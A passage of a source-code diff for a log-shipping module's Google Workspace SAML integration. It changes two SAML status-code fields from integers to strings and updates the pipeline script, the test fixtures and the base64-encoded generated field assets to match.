3Nyyb2fGLogBWhA5Ow3TY5/F6w3brFSSW6UnDI3Nkq9THAqXMVk4mMmNbx092Ui3h0TCqWFCC3J0dMFJ5C8c1rghAO8tAdMkTxLBA6TJwCVVJe/Edg4So8FIk0TVdqYSJWkwDpWE1WU1CWkimDEUaAdciKlSAsnmrrcmxzvJ3CGPBngOESvQGCA+7d3TsCa/FL+4RbdTuibliippUabN3ABhnq/YuZiqL03y1U5RPteol2mhZe8Je5ywDzapSR6//6wOOdyJF8IRZdBMDylpE0JHSOyL6W3h7gcCpPPz96Ie++AZFOdUDPUg3vaDJaqIorbBkk633qJWWpBAVVlu9acaMVRZEbnM1EIiy4Je+42uXcFzHy1eBdAjEhCIDKAWcijNiBur+bSOqcGW27Q79v6p02aBwBKmwo+wKDgtmsR3EgLsMfLtay2Unp0NJNqd7jzr0+r4C7JPqw5yQKnr+jxlVa7UqPm8WzNzSKb/lAtBpqJf8Xucxb8X6Aun/L11Iz1wswIeuEL1iUJZrgRDfcjdSz+AL+g7GKNl8SZI0oNynDg5PyyfYK3duIvnStHau4pXboKFE+yrTv/Nid1OY/bFQm49ZKRKSdTv3zNircoboWoGd1r9idQZM40ltxaBc/5Jhdq5ks7TLJpDv3/O+3FyR9mhuW89ANxkpiDanYodTR2wersq+L/QCHJBZsBQKp9dvIir3JP7kiQI9GEHGswBKoleZr5KaTwJ13YcL8oqA9CXQ8ElGC7dGPqSzDAizhUIc7kkS5ihRO0MEYNz1ESElgMGQFvPo8+2upMEFOfZA5IySDyJJZyqqkOUM48VmEFo0Cj8anBrj7Taga83xNI7I8QnpnPpq1Pbb/X3ec4Nn3LRLnlL7u5vK0zfR6JnaMOUPpGdJbn+pHeuSrdWYpK+0lBpJ3jUgc/QFRijT+ZH/8t6BQu3IZzlOkI0FKiHriBSK1nGkX69FmZv6U2BaE3GSzdymXaA2epWOWOKHturK0Vbu/cK0uetRFYIrOBZtyj3BdaE1/AzcFuV3EChBDPrWt21XLOA8PUldLNW+c1UtF9vzZN+0cM+kHVqZxPFbpWQuHkYzP1wQFOKxoTQ+1roN8SOnUtAhFFNKbwvQAHXK6uAx8BTg9QL5Aldg8Bvgpngi8NbilnlerJoag3cNTCGLNPqAHNyp24uHSaU6LxhU/Aq5Hz6BeFOzPPgDHG55ZyAr+wNDW/az92IU3/sC4VYyx7AnVZaJ2xLhxvqO1V1rRkzjVv5DTTXX0ZwOnrSWKr56CvvY0D9u6y9sHcfHRsMFmD4boqGjWXTCXWExNKkWAehIqtQl9wXk4w3rLEycoW8spjqijmL/duOX0dxGzcOY+shJPht2azTKr+6tLcedQ/ecRdzpPV1GKc6wHEijj3Ef5X5/QIe3fvGO/sv89+NdTtrK+VklZHqIHb69aFxSv5yqhh5TvgvjP21NBCrEhLuX7tquL99uHsud/BpNkSuV0F09dEUmTp/qFQs1q5sDcg1WM+vZ2Tk8vPb2IuWRH2RXd+BjSEkGuGRVJV2lt4jEMngUeOf/gNOjwPBD0tsfXQyWY+DFxHje9PmuxyqtlVt47gM1AkNdilUQMUOmZpSRLbWo47FJtQs9TNU8cNXIbkpi1lJB8fNaUGEQOfhjJ14euO6+Izf5Jx+1VXu1Txw40C4qPXYjl3odMT+BndDWzr8Eh2lGn10nghzWp3lJgufEMly/0XH3o73XbG0AWpTccrVwPaz2Xq1Y5FSpK3s52u0pCrAnlOIlALu7/ZM3P97rhA3PEMpt9xyZ7Nn0xHD2B9Dzle4vbq/vL0BUtvCLZpt375TelZLbrOK2GI8WQA+hYjCrJvEsX7gZlSx/kHflU3UM+tcp+Op62CHCsf9cvXJktlLCeE5QkLmukT/DgAA//9gcf1M" + return "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" } diff --git a/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml b/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml index b7e9efc09266..fc0adfcb55c2 100644 --- a/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml +++ b/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml @@ -18,10 +18,10 @@ description: > User orgunit. - name: status_code - type: long + type: keyword description: > SAML status code. - name: second_level_status_code - type: long + type: keyword description: > SAML second level status code. diff --git a/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js b/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js index 9a779f8dd884..705db7f2f1e7 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js @@ -32,14 +32,7 @@ var saml = (function () { // all saml event parameters are strings. // for this reason we know for sure they are in the 'value' field. // https://developers.google.com/admin-sdk/reports/v1/appendix/activity/saml - switch (p.name) { - case "status_code": - case "second_level_status_code": - evt.Put("google_workspace.saml."+p.name, parseInt(p.value)); - break; - default: - evt.Put("google_workspace.saml."+p.name, p.value); - } + evt.Put("google_workspace.saml."+p.name, p.value); }); evt.Delete("json.events.parameters"); diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log index 678193e25d5f..ed672b58a568 100644 --- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log +++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log @@ -1,2 +1,2 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"400"},{"name":"saml_status_code","value":"400"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"400"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json index 90f6463ce340..d6f84e5c64fc 100644 --- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json @@ -9,7 +9,7 @@ "event.dataset": "google_workspace.saml", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"400\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "failure", "event.provider": "saml", "event.type": [ @@ -24,8 +24,8 @@ "google_workspace.saml.failure_type": "failure_app_not_configured_for_user", "google_workspace.saml.initiated_by": "idp", "google_workspace.saml.orgunit_path": "ounit", - "google_workspace.saml.second_level_status_code": 400, - "google_workspace.saml.status_code": 400, + "google_workspace.saml.second_level_status_code": "SUCCESS_URI", + "google_workspace.saml.status_code": "SUCCESS_URI", "input.type": "log", "log.offset": 0, "organization.id": "1", @@ -68,7 +68,7 @@ "event.dataset": "google_workspace.saml", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "success", "event.provider": "saml", "event.type": [ @@ -82,9 +82,9 @@ "google_workspace.saml.application_name": "app", "google_workspace.saml.initiated_by": "idp", "google_workspace.saml.orgunit_path": "ounit", - "google_workspace.saml.status_code": 400, + "google_workspace.saml.status_code": "SUCCESS_URI", "input.type": "log", - "log.offset": 606, + "log.offset": 622, "organization.id": "1", "related.ip": [ "98.235.162.24" diff --git a/x-pack/filebeat/module/gsuite/fields.go b/x-pack/filebeat/module/gsuite/fields.go index 1d4d320cd3bb..b25ae2dec1f2 100644 --- a/x-pack/filebeat/module/gsuite/fields.go +++ b/x-pack/filebeat/module/gsuite/fields.go @@ -19,5 +19,5 @@ func init() { // AssetGsuite returns asset data. // This is the base64 encoded gzipped contents of module/gsuite. func AssetGsuite() string { - return "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" + return 